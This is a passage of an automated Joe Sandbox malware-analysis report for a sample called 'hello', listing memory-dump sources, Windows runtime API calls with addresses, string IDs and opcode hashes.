                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: @$lYb
                                                                                                                                                                                                                                          • API String ID: 3732870572-948519696
                                                                                                                                                                                                                                          • Opcode ID: 0f69cd205593f7154666fbcf5752906efc6a50659c9d96c8b132b1cd6a1b47de
                                                                                                                                                                                                                                          • Instruction ID: d471a4a48d7d723f92318b8f7e3833bedd6d4f7bb0911a3ea88a4986af80571b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f69cd205593f7154666fbcf5752906efc6a50659c9d96c8b132b1cd6a1b47de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91214AB1E44609ABDB10DFD8DD49FAEBBB9FB48B04F104119F205BB680C77959048FA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6C3917E3,00000000,?,00000001,?,?,?,6C3918D2,00000001,FlsFree,6C39CF70,FlsFree), ref: 6C39183F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6C3917E3,00000000,?,00000001,?,?,?,6C3918D2,00000001,FlsFree,6C39CF70,FlsFree,00000000,?,6C391331), ref: 6C391849
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6C391871
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                          • Opcode ID: eee4ca70eb99ccd97eaf63cf8f7d3ed359f5002674b4b72651b5eed3aa0dd656
                                                                                                                                                                                                                                          • Instruction ID: 558f7b490befb5dd49bbba27186c2ec2c31baa0feef38c0dc4ec677f8d94d5c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eee4ca70eb99ccd97eaf63cf8f7d3ed359f5002674b4b72651b5eed3aa0dd656
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1E01A31688205B7EF002E75EC05B893A7DAF01B58F208421F90EB89A1F763D8109A95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(9D037332,00000000,00000000,?), ref: 6C398684
                                                                                                                                                                                                                                            • Part of subcall function 6C395F47: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C3980BF,?,00000000,-00000008), ref: 6C395FA8
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C3988D6
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C39891C
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C3989BF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                          • Opcode ID: 373678ecc015218b31418664bad2458650e964eafd56d3060bb1129525ea62e0
                                                                                                                                                                                                                                          • Instruction ID: 683678534cc72e6d3c270e6f54074b24139a6f97a8e90bdddc4c54739ffd2e9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 373678ecc015218b31418664bad2458650e964eafd56d3060bb1129525ea62e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55D17B75E052489FCF01CFA8C8809ADBBB9FF49318F24456AE456EB751E731A901CF62
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                          • Opcode ID: 3ec764edcc9a0571e412ed3ea509b2ae1ffeb0a9652504a171fd3f071579b483
                                                                                                                                                                                                                                          • Instruction ID: 9c71e4c13854fd19086dae907fc7a6082b5c3432f7db21e3006b59b1ba6382e6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec764edcc9a0571e412ed3ea509b2ae1ffeb0a9652504a171fd3f071579b483
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C651F073A05602AFEB158F95D840BAAB3BDEF05318F20452DE85667A90F732ED44CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 6C395F47: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C3980BF,?,00000000,-00000008), ref: 6C395FA8
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C394C79
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6C394C80
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 6C394CBA
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6C394CC1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                          • Opcode ID: e90c0cf424794ef1e325121c25db6aacc5e92ae2834b53c11d8f48fe6babf119
                                                                                                                                                                                                                                          • Instruction ID: f513a9cda4cf3d183b445d0e3847a4efd77c0664b60e7f47ed75a03a1896876c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e90c0cf424794ef1e325121c25db6aacc5e92ae2834b53c11d8f48fe6babf119
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07214172604205BF9B10AF66888089AB7BDBF4536D7048619E9B597A50F732E8508FA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6C395FF2
                                                                                                                                                                                                                                            • Part of subcall function 6C395F47: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C3980BF,?,00000000,-00000008), ref: 6C395FA8
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C39602A
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C39604A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                          • Opcode ID: 2f715d1ed983a165de8bd86f2a935a65f076947a2a583773cc0f61c7ac3dc8d7
                                                                                                                                                                                                                                          • Instruction ID: 587ae7af0e39f8ed5e4908934f684144990d4c645e466d9e6ccb54f9d2a6f5a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f715d1ed983a165de8bd86f2a935a65f076947a2a583773cc0f61c7ac3dc8d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B11A1F160A515BEAB615B765CC9CEF7A7CDE8A2AD3000115F442D2700FB22CD054EF6
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C3994E5,00000000,00000001,00000000,?,?,6C398A13,?,00000000,00000000), ref: 6C399D3D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6C3994E5,00000000,00000001,00000000,?,?,6C398A13,?,00000000,00000000,?,?,?,6C398FB6,00000000), ref: 6C399D49
                                                                                                                                                                                                                                            • Part of subcall function 6C399D0F: CloseHandle.KERNEL32(FFFFFFFE,6C399D59,?,6C3994E5,00000000,00000001,00000000,?,?,6C398A13,?,00000000,00000000,?,?), ref: 6C399D1F
                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6C399D59
                                                                                                                                                                                                                                            • Part of subcall function 6C399CD1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C399D00,6C3994D2,?,?,6C398A13,?,00000000,00000000,?), ref: 6C399CE4
                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6C3994E5,00000000,00000001,00000000,?,?,6C398A13,?,00000000,00000000,?), ref: 6C399D6E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                          • Opcode ID: d2e76206ba6209e414112965fad282871aa7e3f98e373ffc815a35e838a4bd02
                                                                                                                                                                                                                                          • Instruction ID: 32ddff1c339b8e8f95e0ce8d84a05e36d0c74bf374201564f673cc9d6953aecf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2e76206ba6209e414112965fad282871aa7e3f98e373ffc815a35e838a4bd02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F0F836600218BBCF122E969C049C93E7AEB0A3A5F058010FA1D85620EA33C920DB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 6C398621: GetConsoleOutputCP.KERNEL32(9D037332,00000000,00000000,?), ref: 6C398684
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6C396E2C,?), ref: 6C399059
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6C396E2C,?,6C396CBF,00000000,?,00000000,6C396CBF,?,00000000,00000000,6C3A1AE0,0000002C,6C396D30,?), ref: 6C399063
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                          • String ID: ,n9l
                                                                                                                                                                                                                                          • API String ID: 2915228174-3278473593
                                                                                                                                                                                                                                          • Opcode ID: d816911dbda051e7b207a49b602ac79a073d41e50a0d9ac6b4350b4e7441e11b
                                                                                                                                                                                                                                          • Instruction ID: 06fb6e66f41caa0937411f1910d9efeafc4dae6cfd4876ff5718204752f7c51b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d816911dbda051e7b207a49b602ac79a073d41e50a0d9ac6b4350b4e7441e11b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D61A572904219AFDF01CFA8D840EEEBBB9AF49308F144146E929A7751E337D905CF61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?), ref: 6C391FD4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                          • Opcode ID: e5d451e4b70f7c21a57d98515bb1e0704a2d9dfd1bb98c9f98c72c0d1bb53826
                                                                                                                                                                                                                                          • Instruction ID: 7bf77621f7a323354777d2317d04aae64e52bf3092201ab74a98b1d54622b93d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5d451e4b70f7c21a57d98515bb1e0704a2d9dfd1bb98c9f98c72c0d1bb53826
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40413772A00609AFDF05CF94CE84AEEBBB5FF48308F148159F914A7661E3369950DF51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Offset: 6C3A3000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 3732870572-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 332fc9f0ae59478ff963c3a5f00b6f38d21dad295a41243ed23b13627e7b5e8c
                                                                                                                                                                                                                                          • Instruction ID: 54b106d773655ab919b1f4275601a8432155acc1bdad8d7d8bb68a89d54c8460
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 332fc9f0ae59478ff963c3a5f00b6f38d21dad295a41243ed23b13627e7b5e8c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B014BB0944208EBEB10DBD0DD89B8DBB78EF14719F208058E7057B6A4C77495568F6A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Offset: 6C3A3000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `p;l$t`b[b$[b$[b
                                                                                                                                                                                                                                          • API String ID: 0-1998222061
                                                                                                                                                                                                                                          • Opcode ID: 40b7d29836f46449834c0e89ea26883cfb92d7d98d44e93668679733dc60ea3f
                                                                                                                                                                                                                                          • Instruction ID: 3f8581dfb120b1c1d06d87167974e1e2ee9edef13cb3c2399d04e9fcf74f7680
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40b7d29836f46449834c0e89ea26883cfb92d7d98d44e93668679733dc60ea3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F31DA74E04209DFCB04CF99C890AAEBBB5FF58309F10819DE815ABB55D331AA91CF90